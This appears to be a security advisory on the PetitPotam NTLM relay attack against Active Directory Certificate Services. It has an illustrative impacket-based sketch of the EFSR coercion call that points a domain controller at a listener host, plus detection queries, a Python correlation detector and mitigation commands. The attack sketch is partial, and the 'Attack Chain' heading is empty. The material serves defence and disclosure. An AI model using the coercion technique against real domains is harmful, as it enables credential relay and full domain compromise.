PetitPotam NTLM Relay Attack (CVE-2021-36942)
Affected Systems:
Windows Server 2022
Windows Server 2019
Windows Server 2016
Active Directory Certificate Services
Executive Summary
PetitPotam is an authentication coercion attack that forces Windows hosts, including domain controllers, to authenticate to an attacker-controlled machine over NTLM. When that coerced authentication is relayed to Active Directory Certificate Services (AD CS), it can lead to full domain compromise.
Technical Analysis
The attack abuses the Encrypting File System Remote (MS-EFSR) protocol to coerce authentication. By sending specially crafted RPC calls to the EFSR interface, an attacker can force a domain controller to authenticate to a host of the attacker's choosing.
EFS RPC Exploitation
# PetitPotam trigger functions (MS-EFSR calls known to coerce authentication)
vulnerable_functions = [
    "EfsRpcOpenFileRaw",
    "EfsRpcEncryptFileSrv",
    "EfsRpcDecryptFileSrv",
    "EfsRpcQueryUsersOnFile",
    "EfsRpcQueryRecoveryAgents",
]

# Example RPC call (illustrative sketch on top of impacket's transport layer)
from impacket.dcerpc.v5 import transport

def trigger_auth(target_dc, listener):
    # Bind to the LSARPC named pipe, which also exposes the MS-EFSR interface.
    # Raw strings keep the backslashes literal ("\f" would otherwise be a form feed).
    binding = rf"ncacn_np:{target_dc}[\PIPE\lsarpc]"
    rpc_con = transport.DCERPCTransportFactory(binding)
    dce = rpc_con.get_dce_rpc()
    # Trigger authentication: the UNC path points at the listener, so the DC
    # authenticates to it when it tries to open the "file".
    # EfsRpcOpenFileRaw stands for the MS-EFSR request and is not defined here.
    EfsRpcOpenFileRaw(dce, rf"\\{listener}\share\file")
Attack Chain
Domain Compromise Steps
Impact Assessment
- Domain Compromise: Full Active Directory takeover
- Credential Theft: Access to all domain credentials
- Persistence: Long-term access via certificates
- Lateral Movement: Unrestricted network access
Detection Methods
# Monitor for access to the MS-EFSR named pipes over IPC$ (Event 5145 records the
# share name \\*\IPC$ and the relative target name, e.g. lsarpc or efsrpc; it does
# not contain the EfsRpc function names themselves)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} |
    Where-Object { $_.Message -match 'IPC\$' -and $_.Message -match '\b(lsarpc|efsrpc)\b' }
# Check for suspicious certificate enrollments (Event 4887: certificate issued;
# the template appears in the request attributes as CertificateTemplate:<name>)
Get-WinEvent -LogName 'Security' -FilterXPath "*[System[(EventID=4887)]]" |
    Where-Object { $_.Message -match 'DomainController|Domain Controller' }
# Enable auditing of logon events so NTLM authentications (Event 4624 with
# Authentication Package NTLM) are recorded and can be reviewed
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
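The three detection queries above each look at one event in isolation. The correlation a SOC would actually want is shown here as an added example (Python written for this page, not code from the original advisory): a PetitPotam-style coercion shows up as an MS-EFSR pipe access on IPC$ (5145) from some source address, followed within a short window by an NTLM logon (4624) of a machine account from that same address rather than from the host the account belongs to, and, if the relay reached AD CS, a DomainController-template certificate (4887) issued to that account. The event field names, the hosts, IPs, timestamps and the KNOWN_HOSTS inventory are constructed assumptions; 5145 and 4887 are the event IDs the page lists and 4624 is the standard logon event.

```python
"""Correlate Security events into a PetitPotam coercion -> NTLM relay finding.

Events are modelled as dicts holding the fields a SIEM would already have
parsed from the Security log.  All hosts, IPs and accounts below are
constructed sample values, not data from any real environment.
"""
from datetime import datetime, timedelta

# Named pipes on IPC$ that expose the MS-EFSR interface.
EFSR_PIPES = {"lsarpc", "efsrpc"}

# Constructed inventory: machine account -> the address it should log on from.
KNOWN_HOSTS = {"DC01$": "10.0.0.10", "CA01$": "10.0.0.20"}


def is_efsr_pipe_access(ev):
    """5145: a client opened an MS-EFSR pipe on the IPC$ share."""
    return (ev["id"] == 5145
            and ev["share"].upper().endswith("IPC$")
            and ev["target"].lower() in EFSR_PIPES)


def is_machine_ntlm_from_foreign_ip(ev, known_hosts=KNOWN_HOSTS):
    """4624: a machine account authenticated with NTLM from an address that is
    not the host the account belongs to.  Accounts missing from the inventory
    are deliberately not flagged, to keep the rule low-noise."""
    if ev["id"] != 4624 or ev["auth_pkg"] != "NTLM":
        return False
    acct = ev["account"]
    return acct.endswith("$") and known_hosts.get(acct) not in (None, ev["src_ip"])


def is_dc_template_issuance(ev):
    """4887: the CA issued a certificate on the DomainController template."""
    return ev["id"] == 4887 and ev["template"] in ("DomainController", "Domain Controller")


def find_relay_chains(events, window=timedelta(minutes=10)):
    """Return one finding per (source IP, machine account) where an EFSR pipe
    access from src_ip is followed, within `window`, by an NTLM logon of a
    machine account from the same src_ip.  Severity is 'critical' when a
    DomainController certificate was then issued to that account, else 'high'."""
    events = sorted(events, key=lambda e: e["time"])
    findings = {}
    for coercion in filter(is_efsr_pipe_access, events):
        deadline = coercion["time"] + window
        for logon in events:
            if not (coercion["time"] <= logon["time"] <= deadline):
                continue
            if not is_machine_ntlm_from_foreign_ip(logon) or logon["src_ip"] != coercion["src_ip"]:
                continue
            issued = any(
                is_dc_template_issuance(i)
                and i["requester"] == logon["account"]
                and logon["time"] <= i["time"] <= deadline
                for i in events
            )
            key = (coercion["src_ip"], logon["account"])
            prev = findings.get(key)
            if prev is None or (issued and prev["severity"] != "critical"):
                findings[key] = {
                    "src_ip": coercion["src_ip"],
                    "account": logon["account"],
                    "severity": "critical" if issued else "high",
                    "coercion_time": coercion["time"],
                }
    return list(findings.values())


# Constructed sample timeline: one benign Kerberos logon, the coercion, the
# relayed NTLM logon, the resulting certificate, and one benign srvsvc access.
T0 = datetime(2021, 8, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    {"id": 4624, "time": T0, "host": "CA01", "account": "DC01$",
     "auth_pkg": "Kerberos", "src_ip": "10.0.0.10"},
    {"id": 5145, "time": T0 + timedelta(seconds=30), "host": "DC01",
     "share": r"\\*\IPC$", "target": "lsarpc", "src_ip": "10.0.0.50"},
    {"id": 4624, "time": T0 + timedelta(seconds=31), "host": "CA01", "account": "DC01$",
     "auth_pkg": "NTLM", "src_ip": "10.0.0.50"},
    {"id": 4887, "time": T0 + timedelta(seconds=33), "host": "CA01",
     "requester": "DC01$", "template": "DomainController"},
    {"id": 5145, "time": T0 + timedelta(minutes=2), "host": "DC01",
     "share": r"\\*\IPC$", "target": "srvsvc", "src_ip": "10.0.0.77"},
]

if __name__ == "__main__":
    for finding in find_relay_chains(SAMPLE_EVENTS):
        print(finding)
```

The key signal is the second rule: a domain controller's machine account should only ever authenticate from the DC's own address, so an NTLM 4624 for `DC01$` arriving from a workstation address is suspicious on its own, and the preceding 5145 from that same address explains how it happened. Feeding real events requires mapping your SIEM's field names onto the keys used here and populating KNOWN_HOSTS from the inventory.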
Mitigation Strategies
Immediate Mitigations
- Disable NTLM on AD CS web enrollment (IIS):
# Configure the CertSrv application to accept only Kerberos for Windows authentication
Set-WebConfigurationProperty -pspath 'MACHINE/WEBROOT/APPHOST/Default Web Site/CertSrv' -filter "system.webServer/security/authentication/windowsAuthentication" -name "providers" -value @{value='Negotiate:Kerberos'}
- RPC Filters:
# Block the MS-EFSR interface (UUID c681d488-d850-11d0-8c52-00c04fd90f7e) at the RPC layer;
# a rule needs a condition and must be committed with "add filter" to take effect
netsh rpc filter add rule layer=um actiontype=block
netsh rpc filter add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
netsh rpc filter add filter
- Extended Protection:
# Enable EPA on Certificate Services
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration" -Name "EPAEnabled" -Value 1
Long-term Solutions
- Disable NTLM authentication domain-wide
- Implement certificate template restrictions
- Network segmentation for CA servers
- Monitor certificate issuance